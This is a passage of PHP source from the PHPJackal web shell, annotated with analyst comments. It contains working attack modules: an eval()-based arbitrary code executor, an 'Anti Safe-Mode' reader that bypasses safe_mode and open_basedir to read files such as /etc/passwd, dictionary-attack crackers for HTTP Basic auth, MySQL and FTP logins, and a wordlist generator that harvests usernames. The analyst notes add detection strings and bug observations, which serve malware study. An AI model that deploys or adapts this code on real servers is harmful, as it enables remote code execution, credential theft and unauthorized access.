if (!empty($_REQUEST['serveR']) && !empty($_REQUEST['useR']) && !empty($_REQUEST['pasS']) && !empty($_REQUEST['querY'])){
$server=$_REQUEST['serveR'];$pass=$_REQUEST['pasS'];$user=$_REQUEST['useR'];$query=$_REQUEST['querY'];
if(!empty($_REQUEST['dB']))$db=$_REQUEST['dB'];
$link = @mysql_connect($server,$user,$pass);
if($link){
if (!empty($db))mysql_select_db($db);
$result=mysql_query($query,$link);
echo "${t}Query result(s):$et";
echo "<font color=blue><pre>";
while($data=mysql_fetch_row($result)){
foreach($data as $v) {
echo $v;
echo "\t";
}
echo "\n";
}
echo "</pre></font>";
mysql_close($link);
}
else{
echo "$errorbox Login failed!$et<br>";
}
}
echo "<center>${t}MySQL cilent:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#666666\">Server:</td><td bgcolor=\"#666666\"><input type=text value=\"";if (!empty($_REQUEST['server'])) echo htmlspecialchars($_REQUEST['server']);else echo "localhost:3306"; echo "\" name=serveR size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Username:</td><td bgcolor=\"#808080\"><input type=text name=useR value=\"";if (!empty($_REQUEST['user'])) echo htmlspecialchars($_REQUEST['user']);else echo "root"; echo "\" size=35></td><tr><td width=\"20%\" bgcolor=\"#666666\">Password:</td><td bgcolor=\"#666666\"><input type=text value=\"";if (!empty($_REQUEST['pass'])) echo htmlspecialchars($_REQUEST['pass']);else echo "123456"; echo "\" name=pasS size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Database:</td><td bgcolor=\"#808080\"><input type=text value=\"";if (!empty($_REQUEST['db'])) echo htmlspecialchars($_REQUEST['db']); echo "\" name=dB size=35></td><tr><td width=\"20%\" bgcolor=\"#666666\">Query:</td><td bgcolor=\"#666666\"><textarea name=querY rows=5 cols=27>";if (!empty($_REQUEST['query'])) echo htmlspecialchars(($_REQUEST['query']));else echo "SHOW DATABASES"; echo "</textarea></td></tr></tr><tr><td width=\"20%\" bgcolor=\"#808080\"></td><td bgcolor=\"#808080\" align=right>$hcwd<input class=buttons type=submit value=\"Submit Query\"></td></tr></form></table></center>";
}
function phpevaL(){
// Arbitrary PHP execution: eval()s $_REQUEST['code'] after stripping the
// "<?php", "<?" and "?>" tokens so pasted script files run as-is.
// Analyst notes: eval() on request input is the defining indicator of this
// module. htmlspecialchars() is applied to eval()'s RETURN value (which is
// only non-null if the code itself returns something) and the result is then
// discarded; anything the evaluated code prints lands inside the <textarea>
// unescaped.
global $t,$hcwd;
if (!empty($_REQUEST['code'])){
echo "<center><textarea rows=\"10\" cols=\"64\">";
$code = str_replace("<?php","",$_REQUEST['code']);
$code = str_replace("<?","",$code);
$code = str_replace("?>","",$code);
htmlspecialchars(eval($code));
echo "</textarea></center><br>";
}
echo "<center>${t}Evaler:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#666666\">Codes:</td><td bgcolor=\"#666666\"><textarea rows=\"10\" name=\"code\" cols=\"64\">";if(!empty($_REQUEST['code']))echo htmlspecialchars($_REQUEST['code']);echo "</textarea></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right>$hcwd<input class=buttons type=submit value=Execute></td></tr></form></table></center>";
}
function whoiS(){
// WHOIS lookup: opens TCP/43 to the request-supplied 'server', sends
// 'domain' followed by CRLF and echoes the reply inside <pre>.
// Analyst notes: the server is attacker-chosen (another outbound-connection
// primitive, port fixed at 43); the fsockopen() result is not checked before
// fputs(); the response is echoed without htmlspecialchars().
global $t,$hcwd;
if (!empty($_REQUEST['server']) && !empty($_REQUEST['domain'])){
$server =$_REQUEST['server'];
$domain=$_REQUEST['domain']."\r\n";
$ser=fsockopen($server,43,$en,$es,5);
fputs($ser,$domain);
echo "<pre>";
while(!feof($ser))echo fgets($ser);
echo "</pre>";
fclose($ser);
}
else{
echo "<center>${t}Whois:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#666666\">Server:</td><td bgcolor=\"#666666\"><input type=text value=\"";if (!empty($_REQUEST['server'])) echo htmlspecialchars($_REQUEST['server']);else echo "whois.geektools.com"; echo "\" name=server size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">domain:</td><td bgcolor=\"#808080\"><input type=text name=domain value=\"";if (!empty($_REQUEST['domain'])) echo htmlspecialchars($_REQUEST['domain']); else echo "google.com"; echo  "\" size=35></td><tr><td bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right>$hcwd<input class=buttons type=submit value=\"Do\"></td></tr></form></table></center>";
}
}
function hexvieW(){
// Hex dump of the file named by $_REQUEST['filE'] as an HTML table:
// offset | first 8 bytes | next 8 bytes | ASCII.
// Analyst notes: the path is opened with no restriction and the fopen()
// result is not checked. Two rendering quirks are visible in the code:
//  - the ASCII loop runs 17 times (k=0..16) over a 32-hex-char buffer, so the
//    last substr() is empty, hexdec('') gives 0, and every row ends in an
//    extra '.';
//  - at end of file fgetc() returns false, ord(false) is 0, and a "00" cell
//    is still emitted for that read.
if (!empty($_REQUEST['filE'])){
$f = $_REQUEST['filE'];
echo "<table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"100%\"><td width=\"10%\" bgcolor=\"#282828\">Offset</td><td width=\"25%\" bgcolor=\"#282828\">Hex</td><td width=\"25%\" bgcolor=\"#282828\"></td><td width=\"40%\" bgcolor=\"#282828\">ASCII</td></tr>";
$file = fopen($f,"r");
$i= -1;
while (!feof($file)) {
$ln='';
$i++;
// Offset column, zero-padded to 8 digits; rows alternate two greys.
echo "<tr><td width=\"10%\" bgcolor=\"#";
if ($i % 2==0) echo "666666";else echo "808080";
echo "\">";echo str_repeat("0",(8-strlen($i * 16))).$i * 16;echo "</td>";
echo "<td width=\"25%\" bgcolor=\"#";
if ($i % 2==0) echo "666666";else echo "808080"; 
echo "\">";
// First group of 8 bytes; $ln accumulates the hex for the ASCII column.
for ($j=0;$j<=7;$j++){
if (!feof($file)){
$tmp = strtoupper(dechex(ord(fgetc($file))));
if (strlen($tmp)==1) $tmp = "0".$tmp;
echo $tmp." ";
$ln.=$tmp;
}
}
echo "</td><td width=\"25%\" bgcolor=\"#";
if ($i % 2==0) echo "666666";else echo "808080"; 
echo "\">";
// Second group of 8 bytes (j=7..14 is also 8 iterations).
for ($j=7;$j<=14;$j++){
if (!feof($file)){
$tmp = strtoupper(dechex(ord(fgetc($file))));
if (strlen($tmp)==1) $tmp = "0".$tmp;
echo $tmp." ";
$ln.=$tmp;
}
}
echo "</td><td width=\"40%\" bgcolor=\"#";
if ($i % 2==0) echo "666666";else echo "808080";
echo "\">";
// ASCII column: control bytes and 127..160 become '.'; higher bytes pass
// through chr() as-is and are only HTML-escaped.
$n=0;$asc="";$co=0;
for ($k=0;$k<=16;$k++){
$co=hexdec(substr($ln,$n,2));
if (($co<=31)||(($co>=127)&&($co<=160)))$co=46;
$asc.= chr($co);
$n+=2;
}
echo htmlspecialchars($asc);
echo "</td></tr>";
}
}
fclose($file);
echo "</table>";
}
function safemodE(){
// "Anti Safe-Mode" file reader: tries several techniques in sequence to read
// $_REQUEST['file'] despite safe_mode / open_basedir, echoing each result.
// Methods, in order: (1) ini_restore() of safe_mode/open_basedir then
// file_get_contents(); (2) copy() through the compress.zlib:// wrapper into a
// tempnam() file; (3) curl file://; (4) curl file:// with an embedded NUL and
// a traversal to __FILE__ (presumably to satisfy a prefix check that stops at
// the NUL - version-dependent, not verified here); (5) if the file is exactly
// /etc/passwd, enumerate users via posix_getpwuid() for uid 0..99998.
// Analyst notes: ini_restore("safe_mode"), "compress.zlib://" and
// curl_init("file://...\x00...") are useful detection strings. All content is
// echoed unescaped. The temp file from method 2 is never unlinked.
global $windows,$t,$hcwd;
if (!empty($_REQUEST['file'])){
$i=1;
echo "<pre>\n<font color=green>Method $i:(ini_restore)</font><font color=blue>\n";
ini_restore("safe_mode");ini_restore("open_basedir");
$tmp = file_get_contents($_REQUEST['file']);
echo $tmp;
$i++;
echo "\n</font><font color=green>Method $i:(copy)</font><font color=blue>\n";
$tmp=tempnam("","cx");
copy("compress.zlib://".$_REQUEST['file'], $tmp);
// If copy() failed the temp file is empty and fread() is asked for 0 bytes.
$fh = fopen($tmp, "r");
$data = fread($fh, filesize($tmp));
fclose($fh);
echo $data;
$i++;
if(function_exists("curl_init")){
echo "\n</font><font color=green>Method $i:(curl_init)[A]</font><font color=blue>\n";
$fh = @curl_init("file://".$_REQUEST['file']."");
$tmp = @curl_exec($fh);
echo $tmp;
$i++;
echo "\n</font><font color=green>Method $i:(curl_init)[B]</font><font color=blue>\n";
$i++;
if(strstr($_REQUEST['file'],DIRECTORY_SEPARATOR))
$ch =curl_init("file:///".$_REQUEST['file']."\x00/../../../../../../../../../../../../".__FILE__);
else $ch = curl_init("file://".$_REQUEST['file']."\x00".__FILE__);
// curl_exec() is invoked twice; the first result is discarded, the second
// is var_dump()ed.
curl_exec($ch);
var_dump(curl_exec($ch));
}
if($_REQUEST['file'] == "/etc/passwd"){
echo "\n</font><font color=green>Method $i:(posix)</font><font color=blue>\n";
for($uid=0;$uid<99999;$uid++){
$h=posix_getpwuid($uid);
if (!empty($h))foreach($h as $v)echo "$v:";}}
$i++;
echo "</pre></font>";
}
echo "<center>${t}Anti Safe-Mode:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#666666\">File:</td><td bgcolor=\"#666666\"><input type=text value=\"";if (!empty($_REQUEST['file'])) echo htmlspecialchars($_REQUEST['file']);elseif(!$windows) echo "/etc/passwd"; echo "\" name=file size=35></td></tr><tr><td bgcolor=\"#808080\"></td><td bgcolor=\"#808080\" align=right>$hcwd<input class=buttons type=submit value=\"Read\"></td></tr></form></table></center>";
}
function crackeR(){
// Menu for the cracker modules: emits one link per seC value (hc, smtp,
// pop3, imap, ftp, snmp, sql, fcr, auth, dic), each carrying the current
// working directory in workingdiR. No input is processed here.
global $et;
$cwd = getcwd();
echo "<center><table border=0 bgcolor=#333333><tr><td><a href=\"".hlinK("seC=hc&workingdiR=$cwd")."\">[Hash]</a> - <a href=\"".hlinK("seC=smtp&workingdiR=$cwd")."\">[SMTP]</a> - <a href=\"".hlinK("seC=pop3&workingdiR=$cwd")."\">[POP3]</a> - <a href=\"".hlinK("seC=imap&workingdiR=$cwd")."\">[IMAP]</a> - <a href=\"".hlinK("seC=ftp&workingdiR=$cwd")."\">[FTP]</a> - <a href=\"".hlinK("seC=snmp&workingdiR=$cwd")."\">[SNMP]</a> - <a href=\"".hlinK("seC=sql&workingdiR=$cwd")."\">[MySQL]</a> - <a href=\"".hlinK("seC=fcr&workingdiR=$cwd")."\">[HTTP form]</a> - <a href=\"".hlinK("seC=auth&workingdiR=$cwd")."\">[HTTP Auth(basic)]</a> - <a href=\"".hlinK("seC=dic&workingdiR=$cwd")."\">[Dictionary maker]</a>$et</center>";
}
function dicmakeR(){
// Wordlist builder with three modes, selected by which request keys are set:
//  1. range/min/max/output  - enumerate all strings of one character class
//     between two lengths (uses PHP's string increment: 'az'++ -> 'ba');
//  2. input/output          - extract the part before ':' from each line of
//     a file (the form defaults to /etc/passwd, i.e. a username list);
//  3. url/output            - download a list with downloadiT().
// 'combo'=1 writes each entry as "word:word" for the U:P crackers.
// Analyst notes: the default output path is "$temp/.dic" (a dot-file in the
// temp directory returned by whereistmP()); output files are opened for
// append ('a') in mode 1 and truncated ('w') in modes 2 and 3.
global $errorbox,$windows,$footer,$t,$et,$hcwd;
if (!empty($_REQUEST['combo'])&&($_REQUEST['combo']==1)) $combo=1 ; else $combo=0;
if (!empty($_REQUEST['range']) && !empty($_REQUEST['output']) && !empty($_REQUEST['min']) && !empty($_REQUEST['max'])){
$min = $_REQUEST['min'];
$max = $_REQUEST['max'];
if($max<$min)die($errorbox ."Bad input!$et". $footer);
$s =$w="";
$out = $_REQUEST['output'];
// Form values are 'a', 'Z' or '0'. The second test is a loose == against
// the integer 0; on PHP < 8 a non-numeric string compares equal to 0, so
// there $r is forced to 0 for every range - verify on the target version.
$r = ($_REQUEST['range']=='a' )?'a':'A';
if ($_REQUEST['range']==0) $r=0;
for($i=0;$i<$min;$i++) $s.=$r;
$dic = fopen($out,'a');
// is_nan() is used as an "is it a letter" test; it expects a float, so its
// behaviour on 'a'/'A' differs across PHP versions (warning+null vs TypeError).
if(is_nan($r)){
while(strlen($s)<=$max){
$w = $s;
if($combo)$w="$w:$w";
fwrite($dic,$w."\n");
$s++;}
}
else{
// Numeric branch: $s becomes an int after the first ++, so it is re-padded
// with leading zeros to $min digits each iteration.
while(strlen($w)<=$max){
$w =(string)str_repeat("0",($min - strlen($s))).$s;
if($combo)$w="$w:$w";
fwrite($dic,$w."\n");
$s++;}
}
fclose($dic);
echo "<font color=blue>Done</font>";
}
if (!empty($_REQUEST['input']) && !empty($_REQUEST['output'])){
$input=fopen($_REQUEST['input'],'r');
if (!$input){
if ($windows)echo $errorbox. "Unable to read from ".htmlspecialchars($_REQUEST['input']) ."$et<br>";
else{
// Fallback when fopen() fails on non-Windows: shells out via shelL().
// At this point $input is the boolean false from fopen(), not the path, so
// the command built here is "cat " with an empty argument; the loop below
// then calls fgets() on a string and fclose() on an array.
$input=explode("\n",shelL("cat $input"));
$output=fopen($_REQUEST['output'],'w');
if ($output){
foreach ($input as $in){
$user = $in;
$user = trim(fgets($in)," \n\r");
if (!strstr($user,":"))continue;
$user=substr($user,0,(strpos($user,':')));
if($combo) fwrite($output,$user.":".$user."\n"); else fwrite($output,$user."\n");
}
fclose($input);fclose($output);
echo "<font color=blue>Done</font>";
}
}
}
else{
$output=fopen($_REQUEST['output'],'w');
if ($output){
while (!feof($input)){
$user = trim(fgets($input)," \n\r");
if (!strstr($user,":"))continue;
$user=substr($user,0,(strpos($user,':')));
if($combo) fwrite($output,$user.":".$user."\n"); else fwrite($output,$user."\n");
}
fclose($input);fclose($output);
echo "<font color=blue>Done</font>";
}
// The message names the 'input' path although it is the output fopen() that failed.
else echo $errorbox." Unable to write data to ".htmlspecialchars($_REQUEST['input']) ."$et<br>";
}
}elseif (!empty($_REQUEST['url']) && !empty($_REQUEST['output'])){
$res=downloadiT($_REQUEST['url'],$_REQUEST['output']);
if($combo && $res){
// file() keeps each line's trailing newline, so "$v:$v\n" embeds a newline
// between the two copies of every word.
$file=file($_REQUEST['output']);
$output=fopen($_REQUEST['output'],'w');
foreach ($file as $v)fwrite($output,"$v:$v\n");
fclose($output);
}
echo "<font color=blue>Done</font>";
}else{
$temp=whereistmP();
echo "<center>${t}Wordlist generator:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#666666\">Range:</td><td bgcolor=\"#666666\"><select name=range><option value=a>a-z</option><option value=Z>A-Z</option><option value=0>0-9</option></select></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Min lenght:</td><td bgcolor=\"#808080\"><select name=min><option value=1>1</option><option value=2>2</option><option value=3>3</option><option value=4>4</option><option value=5>5</option><option value=6>6</option><option value=7>7</option><option value=8>8</option><option value=9>9</option><option value=10>10</option></select></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\">Max lenght:</td><td bgcolor=\"#666666\"><select name=max><option value=2>2</option><option value=3>3</option><option value=4>4</option><option value=5>5</option><option value=6>6</option><option value=7>7</option><option value=8 selected>8</option><option value=9>9</option><option value=10>10</option><option value=11>11</option><option value=12>12</option><option value=13>13</option><option value=14>14</option><option value=15>15</option></select></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Output:</td><td bgcolor=\"#808080\"><input type=text value=\"$temp/.dic\" name=output size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\"><input type=checkbox name=combo style=\"border-width:1px;background-color:#666666;\" value=1 checked>Combo style output</td></tr><td bgcolor=\"#808080\"></td><td bgcolor=\"#808080\" align=right>$hcwd<input class=buttons type=submit value=Make></td></tr></form></table><br>${t}Grab dictionary:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#666666\">Grab from:</td><td bgcolor=\"#666666\"><input type=text value=\"/etc/passwd\" name=input size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Output:</td><td bgcolor=\"#808080\"><input type=text 
value=\"$temp/.dic\" name=output size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\"><input type=checkbox style=\"border-width:1px;background-color:#666666;\" name=combo value=1 checked>Combo style output</td></tr><td bgcolor=\"#808080\"></td><td bgcolor=\"#808080\" align=right>$hcwd<input class=buttons type=submit value=Grab></td></tr></form></table><br>${t}Download dictionary:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#666666\">URL:</td><td bgcolor=\"#666666\"><input type=text value=\"http://vburton.ncsa.uiuc.edu/wordlist.txt\" name=url size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Output:</td><td bgcolor=\"#808080\"><input type=text value=\"$temp/.dic\" name=output size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\"><input type=checkbox style=\"border-width:1px;background-color:#666666;\" name=combo value=1 checked>Combo style output</td></tr><tr><td bgcolor=\"#808080\"></td><td bgcolor=\"#808080\" align=right>$hcwd<input class=buttons type=submit value=Get></td></tr></form></table></center>";}
}
function calC(){
// Converter: applies one whitelisted PHP function (md5, sha1, crc32,
// ip2long, long2ip, base64_*, url*) to $_REQUEST['input'] via a variable
// function call, or hex-encodes it byte by byte when 'to' is 'hex'.
// Analyst notes: '-' in the whitelist is not a function name (the form never
// submits it, but a crafted request would fatal on it); the result is echoed
// unescaped inside the <textarea>; "$str{$i}" string-offset syntax was
// removed in PHP 8; with 'to' absent, in_array(null, ...) is evaluated.
global $t,$et,$hcwd;
$fu = array('-','md5','sha1','crc32','hex','ip2long','long2ip','base64_encode','base64_decode','urldecode','urlencode');
if (!empty($_REQUEST['input']) && (in_array($_REQUEST['to'],$fu))){
echo "<center>${t}Output:<br><textarea rows=\"10\" cols=\"64\">";
if($_REQUEST['to']!='hex')echo $_REQUEST['to']($_REQUEST['input']);else for($i=0;$i<strlen($_REQUEST['input']);$i++)echo strtoupper(dechex(ord($_REQUEST['input']{$i})));
echo "</textarea>$et</center><br>";
}
echo "<center>${t}Convertor:</td><td bgcolor=\"#333333\"></td></tr><form method=\"POST\"><tr><td width=\"20%\" bgcolor=\"#666666\">Input:</td><td bgcolor=\"#666666\"><textarea rows=\"10\" name=\"input\" cols=\"64\">";if(!empty($_REQUEST['input']))echo htmlspecialchars($_REQUEST['input']);echo "</textarea></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Task:</td><td bgcolor=\"#808080\"><select size=1 name=to><option value=md5>MD5</option><option value=sha1>SHA1</option><option value=crc32>crc32</option><option value=ip2long>IP to long</option><option value=long2ip>Long to IP</option><option value=hex>HEX</option><option value=urlencode>URL encoding</option><option value=urldecode>URL decoding</option><option value=base64_encode>Base64 encoding</option><option value=base64_decode>Base64 decoding</option></select></td><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right><input class=buttons type=submit value=Convert></td></tr>$hcwd</form></table></center>";
}
function authcrackeR(){
// HTTP Basic-auth dictionary attack against $_REQUEST['target'], one TCP
// connection (port 80, 5 s timeout) per candidate. A response whose status
// line has "20" at offset 9 (2xx) is reported as a hit.
// Analyst notes: this generates a burst of requests FROM the web server with
// a distinct "Accept-Encoding: text" header and a Referer equal to the bare
// host name. The dictionary fopen() is not checked. Observations on the
// control flow are marked inline.
global $errorbox,$et,$t,$crack,$hcwd;
if(!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){
$data='';
$method=($_REQUEST['method'])?'POST':'GET';
// Anything after '?' in the target is split off as the request body/query.
if(strstr($_REQUEST['target'],'?')){$data=substr($_REQUEST['target'],strpos($_REQUEST['target'],'?')+1);$_REQUEST['target']=substr($_REQUEST['target'],0,strpos($_REQUEST['target'],'?'));}
spliturL($_REQUEST['target'],$host,$page);
$type=$_REQUEST['combo'];
$user=(!empty($_REQUEST['user']))?$_REQUEST['user']:"";
// Single '=' here: this assigns 'GET' rather than comparing, so $method is
// always 'GET' from this point and the POST header branch below is dead.
// $data is appended to $page without a '?' separator.
if($method='GET')$page.=$data;
$dictionary=fopen($_REQUEST['dictionary'],'r');
echo "<font color=blue>";
while(!feof($dictionary)){
if($type){
// Combo dictionary: "user:pass" per line.
$combo=trim(fgets($dictionary)," \n\r");
$user=substr($combo,0,strpos($combo,':'));
$pass=substr($combo,strpos($combo,':')+1);
}else{
$pass=trim(fgets($dictionary)," \n\r");
}
$so=fsockopen($host,80,$en,$es,5);
if(!$so){echo "$errorbox Can not connect to host$et";break;}
else{
$packet="$method /$page HTTP/1.0\r\nAccept-Encoding: text\r\nHost: $host\r\nReferer: $host\r\nConnection: Close\r\nAuthorization: Basic ".base64_encode("$user:$pass");
if($method=='POST')$packet.="Content-Type: application/x-www-form-urlencoded\r\nContent-Length: ".strlen($data);
$packet.="\r\n\r\n";
$packet.=$data;
fputs($so,$packet);
// Only the first two digits of the status code are inspected.
$res=substr(fgets($so),9,2);
fclose($so);
if($res=='20')echo "U: $user P: $pass</br>";
flusheR();
}
}
// No break on success: the whole dictionary is always consumed.
echo "Done!</font>";
}else echo "<center><form method=\"POST\" name=form>${t}HTTP Auth cracker:</td><td bgcolor=\"#333333\"><select name=method><option value=1>POST</option><option value=0>GET</option></select></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\">Dictionary:</td><td bgcolor=\"#666666\"><input type=text name=dictionary size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Dictionary type:</td><td bgcolor=\"#808080\"><input type=radio name=combo checked value=0 onClick=\"document.form.user.disabled = false;\" style=\"border-width:1px;background-color:#808080;\">Simple (P)<input type=radio value=1 name=combo onClick=\"document.form.user.disabled = true;\" style=\"border-width:1px;background-color:#808080;\">Combo (U:P)</td></tr><tr><td width=\"20%\" bgcolor=\"#666666\">Username:</td><td bgcolor=\"#666666\"><input type=text size=35 value=root name=user></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Server:</td><td bgcolor=\"#808080\"><input type=text name=target value=localhost size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right>$hcwd<input class=buttons type=submit value=Start></td></tr></form></table></center>";
}
function sqlcrackeR(){
// MySQL login dictionary attack: one mysql_connect() per candidate against
// $_REQUEST['target']. Stops at the first hit for a simple (password-only)
// list; continues through a combo (user:pass) list.
// Analyst notes: a hit is printed with a "Connect" link that embeds the
// username and password as plain GET parameters (they end up in access logs
// and browser history). Requires the legacy mysql_* extension.
global $errorbox,$t,$et,$crack;
if (!function_exists("mysql_connect")){
echo "$errorbox Server does n`t support MySQL$et";
}
else{
if (!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){
$target=$_REQUEST['target'];
$type=$_REQUEST['combo'];
$user=(!empty($_REQUEST['user']))?$_REQUEST['user']:"";
$dictionary=fopen($_REQUEST['dictionary'],'r');
if ($dictionary){
echo "<font color=blue>Cracking ".htmlspecialchars($target)."...<br>";
while(!feof($dictionary)){
if($type){
// Combo dictionary: "user:pass" per line.
$combo=trim(fgets($dictionary)," \n\r");
$user=substr($combo,0,strpos($combo,':'));
$pass=substr($combo,strpos($combo,':')+1);
}else{
$pass=trim(fgets($dictionary)," \n\r");
}
$sql=@mysql_connect($target,$user,$pass);
if($sql){echo "U: $user P: $pass (<a href=\"".hlinK("seC=mysql&serveR=$target&useR=$user&pasS=$pass&querY=SHOW+DATABASES&workingdiR=".getcwd())."\">Connect</a>)<br>";mysql_close($sql);if(!$type)break;}
flusheR();
}
echo "<br>Done</font>";
fclose($dictionary);
}
else{
echo "$errorbox Can not open dictionary.$et";
}
}
else{
// $crack (defined elsewhere in the file) holds the shared cracker form.
echo "<center>${t}MySQL cracker:$crack";
}
}
}
function ftpcrackeR(){
// FTP login dictionary attack: a fresh ftp_connect() (port 21, 8 s timeout)
// and ftp_login() per candidate against $_REQUEST['target']. Stops at the
// first hit for a simple list; continues through a combo (user:pass) list.
// Analyst notes: produces one complete TCP session per attempt from the web
// server's address; the loop aborts on the first connection failure.
global $errorbox,$t,$et,$crack;
if (!function_exists("ftp_connect"))echo "$errorbox Server does n`t support FTP functions$et";
else{
if (!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){
$target=$_REQUEST['target'];
$type=$_REQUEST['combo'];
$user=(!empty($_REQUEST['user']))?$_REQUEST['user']:"";
$dictionary=fopen($_REQUEST['dictionary'],'r');
if ($dictionary){
echo "<font color=blue>Cracking ".htmlspecialchars($target)."...<br>";
while(!feof($dictionary)){
if($type){
// Combo dictionary: "user:pass" per line.
$combo=trim(fgets($dictionary)," \n\r");
$user=substr($combo,0,strpos($combo,':'));
$pass=substr($combo,strpos($combo,':')+1);
}else{
$pass=trim(fgets($dictionary)," \n\r");
}
if(!$ftp=ftp_connect($target,21,8)){echo "$errorbox Can not connect to server.$et";break;}
if (@ftp_login($ftp,$user,$pass)){echo "U: $user P: $pass<br>";if(!$type)break;}
ftp_close($ftp);
flusheR();
}
echo "<br>Done</font>";
fclose($dictionary);
}
else{
echo "$errorbox Can not open dictionary.$et";
}
}
// $crack (defined elsewhere in the file) holds the shared cracker form.
else echo "<center>${t}FTP cracker:$crack";
}}
function openiT($name){
// Display a file: PHP-like extensions are rendered with highlight_file(),
// everything else as HTML-escaped text inside <pre>.
// Analyst notes: $name comes straight from the request (see the 'openit'
// dispatch case) with no path restriction. For a name with no '.', strrpos()
// returns false and false+1 is 1, so $ext becomes the name minus its first
// character - harmless here, it just never matches the $src list.
$ext=strtolower(substr($name,strrpos($name,'.')+1));
$src=array('php','php3','php4','phps','phtml','phtm','inc');
if(in_array($ext,$src))highlight_file($name);
else echo "<font color=blue><pre>".htmlspecialchars(file_get_contents($name))."</pre></font>";
}
function logouT(){
// Expire the 'passw' auth cookie and redirect to the script itself.
// Note: this is called from the dispatch switch, which runs after the
// navigation bar HTML has already been echoed, so setcookie()/header() are
// issued after output has started - they only take effect if output
// buffering is enabled (not verified from this file).
setcookie('passw','',time()-10000);
header('Location: '.hlinK());
}
1369 ?>
1370 <html>
1371 <head>
1372 <style>body{background: #660000 scrollbar-base-color: #484848; scrollbar-arrow-color: #FFFFFF; scrollbar-track-color: #969696;font-size:16px;font-family:"Arial Narrow";}Table { font-size: 15px; } .buttons{font-family:Verdana;font-size:10pt;font-weight:normal;font-style:normal;color:#FFFFFF;background-color:#555555;border-style:solid;border-width:1px;border-color:#FFFFFF;}textarea{border: 0px #000000 solid;background: #EEEEEE;color: #000000;}input{background: #EEEEEE;border-width:1px;border-style:solid;border-color:black}select{background: #EEEEEE; border: 0px #000000 none;}</style>
1373 <meta http-equiv="Content-Language" content="en-us">
1374 <title>PHPJackal</title>
1375 </head><body text="#E2E2E2" bgcolor="#660000" link="#DCDCDC" vlink="#DCDCDC" alink="#DCDCDC">
1376 <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#282828" bgcolor="#333333" width="100%">
1377 <tr><td><a href=javascript:history.back(1)>[Back]</a> - <a href="<?php $cwd= getcwd(); echo hlinK("seC=sysinfo&workingdiR=$cwd");?>">[Info]</a> - <a href="<?php echo hlinK("seC=fm&workingdiR=$cwd");?>">[File manager]</a> - <a href="<?php echo hlinK("seC=edit&workingdiR=$cwd");?>">[Editor]</a> - <a href="<?php echo hlinK("seC=webshell&workingdiR=$cwd");?>">[Web shell]</a> - <a href="<?php echo hlinK("seC=br&workingdiR=$cwd");?>">[B/R shell]</a> - <a href="<?php echo hlinK("seC=asm&workingdiR=$cwd");?>">[Safe-mode]</a> - <a href="<?php echo hlinK("seC=mysql&workingdiR=$cwd"); ?>">[SQL]</a> - <a href="<?php echo hlinK("seC=mailer&workingdiR=$cwd"); ?>">[Mailer]</a> - <a href="<?php echo hlinK("seC=eval&workingdiR=$cwd");?>">[Evaler]</a> - <a href="<?php echo hlinK("seC=sc&workingdiR=$cwd"); ?>">[Scanners]</a> - <a href="<?php echo hlinK("seC=cr&workingdiR=$cwd");?>">[Crackers]</a> - <a href="<?php echo hlinK("seC=px&workingdiR=$cwd");?>">[Pr0xy]</a> - <a href="<?php echo hlinK("seC=whois&workingdiR=$cwd");?>">[Whois]</a> - <a href="<?php echo hlinK("seC=calc&workingdiR=$cwd");?>">[Convert]</a> - <a href="<?php echo hlinK("seC=about&workingdiR=$cwd");?>">[About]</a> <?php if(isset($_COOKIE['passw'])) echo "- [<a href=\"".hlinK("seC=logout")."\">Logout</a>]";?></td></tr></table>
1378 <hr size=1 noshade>
1379 <?php
1380 if (!empty($_REQUEST['seC'])){
1381 switch($_REQUEST['seC']){
1382 case 'fm':filemanager();break;
1383 case 'sc':scanneR();break;
1384 case 'phpinfo': phpinfo();break;
1385 case 'edit': if (!empty($_REQUEST['open']))editoR($_REQUEST['filE']);
1386 if (!empty($_REQUEST['Save'])){
1387 $filehandle= fopen($_REQUEST['file'],"w");
1388 fwrite($filehandle,$_REQUEST['edited']);
1389 fclose($filehandle);}
1390 if (!empty($_REQUEST['filE'])) editoR($_REQUEST['filE']);else editoR('');
1391 break;
1392 case 'openit':openiT($_REQUEST['namE']);break;
1393 case 'cr': crackeR();break;
1394 case 'dic':dicmakeR();break;
1395 case 'whois':whoiS();break;
1396 case 'hex':hexvieW();break;
1397 case 'img':showimagE($_REQUEST['filE']);break;
